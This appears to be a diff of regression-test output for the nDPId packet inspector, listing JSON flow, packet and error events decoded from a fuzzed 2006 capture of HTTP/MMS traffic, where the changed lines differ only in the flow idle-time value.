+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854514844} 02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAXcFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":445,"global_ts_msec":1031854514844} 00925{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":479,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl0lcwCLk5N8CABFAAHRFktVAIAGhKGsFAMFrBQDDQorAFDkqXCFyh06CVAYIo+iDAAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVmdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2tpZTpKVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143} 00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 